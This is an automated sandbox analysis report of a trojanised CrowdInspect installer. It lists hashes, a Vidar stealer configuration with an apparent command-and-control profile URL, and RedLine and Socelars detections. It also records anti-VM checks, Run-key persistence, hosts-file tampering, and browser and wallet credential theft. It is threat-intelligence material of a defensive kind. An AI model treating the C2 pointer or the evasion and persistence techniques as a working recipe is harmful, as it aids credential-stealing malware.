Analysis
max time kernel: 2352s
max time network: 2355s
platform: windows11_x64
resource: win11
submitted: 18-10-2021 13:27
Static task: static1
General
Target: CrowdInspect.sfx.exe
Size: 5.4MB
MD5: 2c5e13c2c114e68a22533d181e78c4e7
SHA1: 92b8ed2a8880f077bf1bbbf835b759fa5f333c46
SHA256: a4c21069788dbf57de477c9b2c5a2027b3d87203eae9852b7d54033687e6b738
SHA512: 092cfe4da514c800d92f94a8f83c19f1807ceaf1981af081b94a3d6c46dcaaa69bbecee0ac198fdbb9fc33b0a295fbedb02c3d2aa461b580bc2be5f8f33a7955
Malware Config
Extracted
vidar
41.4
932
https://mas.to/@sslam
profile_id: 932
Signatures

Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process (pid 6088, pid_target 5128, rundll32.exe)
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process (pid 4900, pid_target 5128, rundll32.exe)
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process (pid 5272, pid_target 5128, rundll32.exe)
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload 3 IoCs
resource | yara_rule
behavioral1/memory/584-343-0x0000000000000000-mapping.dmp | family_redline
behavioral1/memory/4728-351-0x0000000000000000-mapping.dmp | family_redline
behavioral1/memory/4720-350-0x0000000005890000-0x0000000005EA8000-memory.dmp | family_redline

Socelars Payload 2 IoCs
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon1190ed9443.exe | family_socelars
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon1190ed9443.exe | family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess 26 IoCs
description | pid | process | target process
PID 4712 created 584 | 4712 | WerFault.exe | Conhost.exe
PID 2020 created 1416 | 2020 | WerFault.exe | WerFault.exe
PID 2068 created 4516 | 2068 | WerFault.exe | rundll32.exe
PID 5980 created 5232 | 5980 | WerFault.exe | cmd.exe
PID 1416 created 1248 | 1416 | WerFault.exe | Mon1190ed9443.exe
PID 3376 created 2672 | 3376 | WerFault.exe | Mon11a22bde2b.exe
PID 5368 created 3056 | 5368 | WerFault.exe | Conhost.exe
PID 1408 created 1452 | 1408 | cmd.exe | Pro.exe
PID 5052 created 3700 | 5052 | gcleaner.exe | WQ_0DNHwegoB5QOHvlIZntSr.exe
PID 1712 created 5856 | 1712 | WerFault.exe | 4mulY6HX0OKjNh4y5va_iEdo.exe
PID 5768 created 5492 | 5768 | WerFault.exe | Calculator.exe
PID 4580 created 5688 | 4580 | WerFault.exe | msiexec.exe
PID 6288 created 5204 | 6288 | Y9cwGigB6qwOuguftOmpB8FC.exe | GBI_yH9a9U9c0kT8e_JoFRwy.exe
PID 432 created 2964 | 432 | WerFault.exe | setup_2.exe
PID 8180 created 7040 | 8180 | WerFault.exe | K0j8f5iqbfnfHvcNjJcr34Ek.exe
PID 7664 created 3500 | 7664 | WerFault.exe | tDQQVMK4kh5kC_VXdu6mwGw2.exe
PID 7416 created 3720 | 7416 | WerFault.exe | powershell.exe
PID 6412 created 5500 | 6412 | powershell.exe | W2JFSO1Ax2gZg76M0IGV9hjG.exe
PID 7700 created 5204 | 7700 | WerFault.exe | GBI_yH9a9U9c0kT8e_JoFRwy.exe
PID 2236 created 3308 | 2236 | WerFault.exe | GcleanerEU.exe
PID 7352 created 7136 | 7352 | WerFault.exe | rundll32.exe
PID 6824 created 6584 | 6824 | GcleanerEU.exe |
PID 4288 created 2800 | 4288 | WerFault.exe | rundll32.exe
PID 8056 created 5052 | 8056 | WerFault.exe | gcleaner.exe
PID 7112 created 3000 | 7112 | WerFault.exe | gcleaner.exe
PID 7924 created 3764 | 7924 | WerFault.exe | EASS.exe

resource | yara_rule
behavioral1/memory/6044-513-0x0000000000400000-0x0000000000B40000-memory.dmp | evasion
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil

Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs

Vidar Stealer 4 IoCs
resource | yara_rule
behavioral1/memory/1416-391-0x0000000004B80000-0x0000000004C56000-memory.dmp | family_vidar
behavioral1/memory/6044-513-0x0000000000400000-0x0000000000B40000-memory.dmp | family_vidar
behavioral1/memory/3056-609-0x0000000004B90000-0x0000000004C66000-memory.dmp | family_vidar
behavioral1/memory/3700-640-0x00000000024F0000-0x00000000025C6000-memory.dmp | family_vidar

resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\libcurl.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\libstdc++-6.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\libstdc++-6.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\libcurl.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\libcurlpp.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\libcurlpp.dll | aspack_v212_v242

Blocklisted process makes network request 19 IoCs
flow | pid | process
289 | 5232 | cmd.exe
290 | 5232 | cmd.exe
310 | 6280 | powershell.exe
334 | 6044 | cmd.exe
356 | 6044 | cmd.exe
368 | 5704 | powershell.exe
369 | 6044 | cmd.exe
462 | 5704 | powershell.exe
474 | 6980 | cmd.exe
528 | 6980 | cmd.exe
551 | 6508 | cmd.exe
571 | 6980 | cmd.exe
1298 | 1524 | powershell.exe
1496 | 2184 | MsiExec.exe
1602 | 2184 | MsiExec.exe
1898 | 1524 | powershell.exe
1902 | 1524 | powershell.exe
2997 | 1524 | powershell.exe
2999 | 1524 | powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs
description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | ShareFolder.exe
File opened for modification | C:\Windows\system32\drivers\etc\hosts | ShareFolder.exe

Executes dropped EXE 64 IoCs
pid | process
1628 | CrowdInspect.exe
1816 | CrowdInspect64.exe
4640 | CrowdInspect.exe
3908 | CrowdInspect.exe
4788 | CrowdInspect.exe
4860 | CrowdInspect.exe
3512 | setup_x86_x64_install.exe
4656 | setup_installer.exe
1356 | setup_install.exe
2280 | Mon11bc113a5813.exe
5104 | Mon11b7ab2df056a.exe
852 | Mon112c3d79b6fdf8.exe
1416 | Mon11991188390d59.exe
4808 | Mon114917d808c86e0ba.exe
1900 | Mon1173d8f84c056.exe
1248 | Mon1190ed9443.exe
1512 | Mon110c83ac9fca39.exe
5008 | Mon11f55cde4ec30.exe
5000 | postback.exe
4836 | Mon11cd46e0d889458.exe
4060 | Mon11a9d578c6.exe
2132 | Mon1124e978ea57bf.exe
1220 | Mon114917d808c86e0ba.exe
4544 | Mon11c267c861c0984e.exe
4004 | Mon114917d808c86e0ba.tmp
4720 | Mon11b7ab2df056a.exe
2672 | Mon11a22bde2b.exe
584 | Conhost.exe
4728 | WerFault.exe
2380 | jBnRXiidSZk9hgIAefJUErEC.exe
3676 | jBnRXiidSZk9hgIAefJUErEC.exe
3748 | Conhost.exe
5000 | postback.exe
4868 | inst1.exe
1532 | BCleanSoft82.exe
2536 | F44LQM.eXE
3056 | Conhost.exe
1452 | Pro.exe
4752 | 79bdtvSpzzQK8f1KkdyOR7P4.exe
408 | QPeacnpa5OCyBgRir69RuR8o.exe
3700 | WQ_0DNHwegoB5QOHvlIZntSr.exe
3204 | Ij6YtsqVdlgwgUz3rMkCp0mj.exe
5196 | QPeacnpa5OCyBgRir69RuR8o.exe
5204 | GBI_yH9a9U9c0kT8e_JoFRwy.exe
5212 | wmiprvse.exe
5232 | cmd.exe
5244 | identity_helper.exe
5148 | p9IkKDDHEvPP_0EBsFu2v6aq.exe
5320 | fLt5aaWDMdJHJUJsdaAbuivD.exe
5336 | brLy3TAdoOEVkJuOS7U49MCH.exe
5404 | 0knn9mY0l5PQHp4gWsjZSlpS.exe
5452 | powershell.exe
5484 | xWDw4KvnprXoiUalqAVdu3zs.exe
5492 | Calculator.exe
5688 | msiexec.exe
5704 | q1qArhKu7efjajBNmy5h0n8M.exe
5856 | 4mulY6HX0OKjNh4y5va_iEdo.exe
5872 | BPB6ZJQKq01MUb8AG050pNjq.exe
5904 | Conhost.exe
5940 | lng6k_fhu4_efH3KoMaBWcns.exe
5948 | jv3ip_oP7Js5FEg88aQhg9IS.exe
5956 | qCbGN2Tg1ZNb43oxn6V5pPXu.exe
5812 | setup.exe
6000 | Ij6YtsqVdlgwgUz3rMkCp0mj.exe

Modifies Windows Firewall 1 TTPs

Checks BIOS information in registry 2 TTPs 36 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 6169518.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 1715481.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Calculator.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | svchost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 104049.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | identity_helper.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | svchost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 104049.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | QPeacnpa5OCyBgRir69RuR8o.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | identity_helper.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 6475169.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | svchost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | jv3ip_oP7Js5FEg88aQhg9IS.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 0knn9mY0l5PQHp4gWsjZSlpS.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 3603410.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Calculator.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | lng6k_fhu4_efH3KoMaBWcns.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | QPeacnpa5OCyBgRir69RuR8o.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 79bdtvSpzzQK8f1KkdyOR7P4.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | powershell.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | QPeacnpa5OCyBgRir69RuR8o.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | QPeacnpa5OCyBgRir69RuR8o.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | xWDw4KvnprXoiUalqAVdu3zs.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | cmd.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 79bdtvSpzzQK8f1KkdyOR7P4.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 6169518.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 1715481.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 3603410.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | lng6k_fhu4_efH3KoMaBWcns.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 0knn9mY0l5PQHp4gWsjZSlpS.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 6475169.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | xWDw4KvnprXoiUalqAVdu3zs.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | cmd.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | jv3ip_oP7Js5FEg88aQhg9IS.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | powershell.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | svchost.exe

Loads dropped DLL 64 IoCs
pid | process
1356 | setup_install.exe
1356 | setup_install.exe
1356 | setup_install.exe
1356 | setup_install.exe
1356 | setup_install.exe
5000 | postback.exe
4004 | Mon114917d808c86e0ba.tmp
4516 | rundll32.exe
5008 | setup.tmp
4616 | setup.tmp
5564 | ZNjEhM7gVrAAxuwEiyqOJ34t.exe
5564 | ZNjEhM7gVrAAxuwEiyqOJ34t.exe
5320 | fLt5aaWDMdJHJUJsdaAbuivD.exe
5564 | ZNjEhM7gVrAAxuwEiyqOJ34t.exe
2092 | msiexec.exe
5564 | ZNjEhM7gVrAAxuwEiyqOJ34t.exe
5564 | ZNjEhM7gVrAAxuwEiyqOJ34t.exe
3928 | LzmwAqmV.exe
3928 | LzmwAqmV.exe
3928 | LzmwAqmV.exe
3928 | LzmwAqmV.exe
3928 | LzmwAqmV.exe
3928 | LzmwAqmV.exe
3928 | LzmwAqmV.exe
3928 | LzmwAqmV.exe
3928 | LzmwAqmV.exe
3928 | LzmwAqmV.exe
3928 | LzmwAqmV.exe
3928 | LzmwAqmV.exe
3928 | LzmwAqmV.exe
3928 | LzmwAqmV.exe
3928 | LzmwAqmV.exe
3928 | LzmwAqmV.exe
3928 | LzmwAqmV.exe
3928 | LzmwAqmV.exe
3928 | LzmwAqmV.exe
3928 | LzmwAqmV.exe
3928 | LzmwAqmV.exe
3928 | LzmwAqmV.exe
3928 | LzmwAqmV.exe
3928 | LzmwAqmV.exe
1476 | ugEsHRx54YV5ePchkNJT6lmN.exe
1476 | ugEsHRx54YV5ePchkNJT6lmN.exe
7488 | pXqJ9z4kMcKRrHcFa0zq6bMh.tmp
7548 | s9ldn7_ecQr1OKXD8s8Chci6.exe
7548 | s9ldn7_ecQr1OKXD8s8Chci6.exe
7764 | mrHwPgjMlMAKo1RO_q8Zcfe4.tmp
1476 | ugEsHRx54YV5ePchkNJT6lmN.exe
7548 | s9ldn7_ecQr1OKXD8s8Chci6.exe
7548 | s9ldn7_ecQr1OKXD8s8Chci6.exe
1476 | ugEsHRx54YV5ePchkNJT6lmN.exe
1476 | ugEsHRx54YV5ePchkNJT6lmN.exe
1476 | ugEsHRx54YV5ePchkNJT6lmN.exe
7548 | s9ldn7_ecQr1OKXD8s8Chci6.exe
7548 | s9ldn7_ecQr1OKXD8s8Chci6.exe
8132 | setup.exe
8132 | setup.exe
6588 | setup.exe
6588 | setup.exe
7096 | setup.exe
7096 | setup.exe
1788 | msiexec.exe
1788 | msiexec.exe
5688 | msiexec.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Adds Run key to start application 2 TTPs 17 IoCs
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | msedge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | msedge.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Microsoft.NET\\Nuhytehuco.exe\"" | ShareFolder.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --EpsUK1" | setup.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | Settings%20Installation.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --EpsUK1" | setup.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | DllHost.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --EpsUK1" | setup.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | setup.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --EpsUK1" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | aipackagechainer.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ | aipackagechainer.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Settings = "C:\\Users\\Admin\\AppData\\Roaming\\Settings\\Settings.exe --EpsUK1" | Settings%20Installation.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | setup.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | setup.exe

Checks for any installed AV software in registry 1 TTPs 2 IoCs
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab | powershell.exe
Key opened | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab | powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 104049.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 6169518.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 1715481.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Calculator.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | svchost.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | lng6k_fhu4_efH3KoMaBWcns.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | cmd.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 79bdtvSpzzQK8f1KkdyOR7P4.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 3603410.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | QPeacnpa5OCyBgRir69RuR8o.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 0knn9mY0l5PQHp4gWsjZSlpS.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | QPeacnpa5OCyBgRir69RuR8o.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | xWDw4KvnprXoiUalqAVdu3zs.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | jv3ip_oP7Js5FEg88aQhg9IS.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 6475169.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | svchost.exe

Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description: File opened (read-only), grouped by process; the ioc column is the drive root opened
msiexec.exe (21): \??\F: \??\I: \??\N: \??\Z: \??\K: \??\T: \??\V: \??\W: \??\R: \??\G: \??\Y: \??\L: \??\J: \??\P: \??\Q: \??\A: \??\E: \??\X: \??\M: \??\O: \??\U:
setting.exe (22): \??\H: \??\J: \??\R: \??\Z: \??\M: \??\X: \??\Q: \??\V: \??\U: \??\O: \??\W: \??\N: \??\Y: \??\B: \??\E: \??\I: \??\S: \??\K: \??\P: \??\T: \??\A: \??\G:
installer.exe (21): \??\F: \??\N: \??\H: \??\G: \??\I: \??\E: \??\J: \??\A: \??\B: \??\Z: \??\P: \??\M: \??\O: \??\T: \??\U: \??\W: \??\Q: \??\X: \??\S: \??\V: \??\Y:

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
142 | ipinfo.io
305 | ipinfo.io
386 | ipinfo.io
397 | ipinfo.io
599 | ipinfo.io
138 | ipinfo.io
137 | ipinfo.io
308 | ipinfo.io
380 | ipinfo.io
603 | checkip.dyndns.org
126 | ip-api.com

Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
pid | process
6044 | cmd.exe
4752 | 79bdtvSpzzQK8f1KkdyOR7P4.exe
5948 | jv3ip_oP7Js5FEg88aQhg9IS.exe
5244 | identity_helper.exe
5704 | powershell.exe
5404 | 0knn9mY0l5PQHp4gWsjZSlpS.exe
6952 | 6169518.exe
6784 | 6475169.exe
6696 | 1715481.exe
6516 | 3603410.exe
5940 | lng6k_fhu4_efH3KoMaBWcns.exe
4420 | 104049.exe

Suspicious use of SetThreadContext 7 IoCs
description | pid | process | target process
PID 2280 set thread context of 584 | 2280 | Mon11bc113a5813.exe | Conhost.exe
PID 5008 set thread context of 4728 | 5008 | setup.tmp | Mon11f55cde4ec30.exe
PID 5872 set thread context of 6816 | 5872 | BPB6ZJQKq01MUb8AG050pNjq.exe | BPB6ZJQKq01MUb8AG050pNjq.exe
PID 5856 set thread context of 5560 | 5856 | 4mulY6HX0OKjNh4y5va_iEdo.exe | AppLaunch.exe
PID 5452 set thread context of 6980 | 5452 | powershell.exe | cmd.exe
PID 1124 set thread context of 3764 | 1124 | EASS.exe | EASS.exe
PID 3152 set thread context of 676 | 3152 | services64.exe | explorer.exe

Drops file in Program Files directory 64 IoCs
All entries below are under C:\Program Files (x86)\lighteningplayer\ unless a full path is given; the process is autosubplayer.exe except for the one Conhost.exe entry.
File created (autosubplayer.exe):
lua\meta\art\03_lastfm.luac
plugins\demux\libnsv_plugin.dll
lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png
plugins\access\libaccess_wasapi_plugin.dll
plugins\demux\libmod_plugin.dll
plugins\demux\libsmf_plugin.dll
lua\http\requests\browse.xml
lua\intf\telnet.luac
plugins\demux\libavi_plugin.dll
plugins\packetizer\libpacketizer_dts_plugin.dll
plugins\demux\libdemuxdump_plugin.dll
plugins\demux\librawaud_plugin.dll
plugins\misc\libaddonsfsstorage_plugin.dll
plugins\demux\libcaf_plugin.dll
lua\http\requests\playlist.xml
lua\playlist\cue.luac
plugins\access\libftp_plugin.dll
lua\http\dialogs\stream_config_window.html
plugins\access\libcdda_plugin.dll
plugins\demux\libdemux_stl_plugin.dll
plugins\gui\libqt_plugin.dll
lua\intf\http.luac
plugins\spu\liblogo_plugin.dll
plugins\spu\librss_plugin.dll
plugins\demux\libdemux_cdg_plugin.dll
plugins\packetizer\libpacketizer_dirac_plugin.dll
lua\http\images\Folder-48.png
plugins\spu\libmarq_plugin.dll
lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png
plugins\keystore\libfile_keystore_plugin.dll
lua\http\css\mobile.css
lua\http\dialogs\create_stream.html
plugins\access\libsdp_plugin.dll
plugins\control\libwin_msg_plugin.dll
plugins\demux\librawvid_plugin.dll
plugins\lua\liblua_plugin.dll
File opened for modification (autosubplayer.exe):
plugins\meta_engine\libtaglib_plugin.dll
plugins\lua\liblua_plugin.dll
plugins\misc\libexport_plugin.dll
lua\http\js\common.js
plugins\access\libsmb_plugin.dll
lua\http\index.html
plugins\access\libcdda_plugin.dll
plugins\demux\libpva_plugin.dll
plugins\packetizer\libpacketizer_flac_plugin.dll
lua\modules\sandbox.luac
lua\http\view.html
plugins\control\liboldrc_plugin.dll
plugins\demux\libvobsub_plugin.dll
plugins\packetizer\libpacketizer_vc1_plugin.dll
lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png
plugins\control\libhotkeys_plugin.dll
plugins\demux\libau_plugin.dll
lua\http\vlm_export.html
lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png
lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png
plugins\demux\libwav_plugin.dll
lua\playlist\twitch.luac
plugins\demux\libaiff_plugin.dll
lua\intf\luac.luac
lua\sd\icecast.luac
lua\http\dialogs\batch_window.html
lua\http\images\Audio-48.png
File opened for modification (Conhost.exe):
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe

Drops file in Windows directory 31 IoCs
Processes:
msiexec.exe, QPeacnpa5OCyBgRir69RuR8o.exe, xWDw4KvnprXoiUalqAVdu3zs.exe, svchost.exe, QPeacnpa5OCyBgRir69RuR8o.exe, WerFault.exe
description ioc process
File opened for modification C:\Windows\Installer\MSI579F.tmp msiexec.exe
File created C:\Windows\SystemTemp\~DFC620C330F12ECD5B.TMP msiexec.exe
File opened for modification C:\Windows\Installer\MSI68F8.tmp msiexec.exe
File created C:\Windows\System\xxx1.bak QPeacnpa5OCyBgRir69RuR8o.exe
File opened for modification C:\Windows\Installer\MSI308A.tmp msiexec.exe
File opened for modification C:\Windows\Installer\f7afdf0.msi msiexec.exe
File created C:\Windows\SystemTemp\~DFB7CDDEB96D6644BF.TMP msiexec.exe
File opened for modification C:\Windows\Installer\MSI5CC1.tmp msiexec.exe
File created C:\Windows\Installer\f7afdf0.msi msiexec.exe
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe
File opened for modification C:\Windows\Installer\MSI34A2.tmp msiexec.exe
File opened for modification C:\Windows\Installer\MSI3D7E.tmp msiexec.exe
File opened for modification C:\Windows\Installer\MSI4985.tmp msiexec.exe
File opened for modification C:\Windows\Installer\ msiexec.exe
File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe
File created C:\Windows\System\xxx1.bak xWDw4KvnprXoiUalqAVdu3zs.exe
File created C:\Windows\System\xxx1.bak svchost.exe
File created C:\Windows\SystemTemp\~DF74A747C3653A3B49.TMP msiexec.exe
File created C:\Windows\System\xxx1.bak QPeacnpa5OCyBgRir69RuR8o.exe
File opened for modification C:\Windows\Installer\MSIB3E.tmp msiexec.exe
File opened for modification C:\Windows\Installer\MSI87FD.tmp msiexec.exe
File created C:\Windows\SystemTemp\~DF040A9E32DF7D854B.TMP msiexec.exe
File opened for modification C:\Windows\System\svchost.exe QPeacnpa5OCyBgRir69RuR8o.exe
File opened for modification C:\Windows\System\svchost.exe xWDw4KvnprXoiUalqAVdu3zs.exe
File created C:\Windows\System\svchost.exe QPeacnpa5OCyBgRir69RuR8o.exe
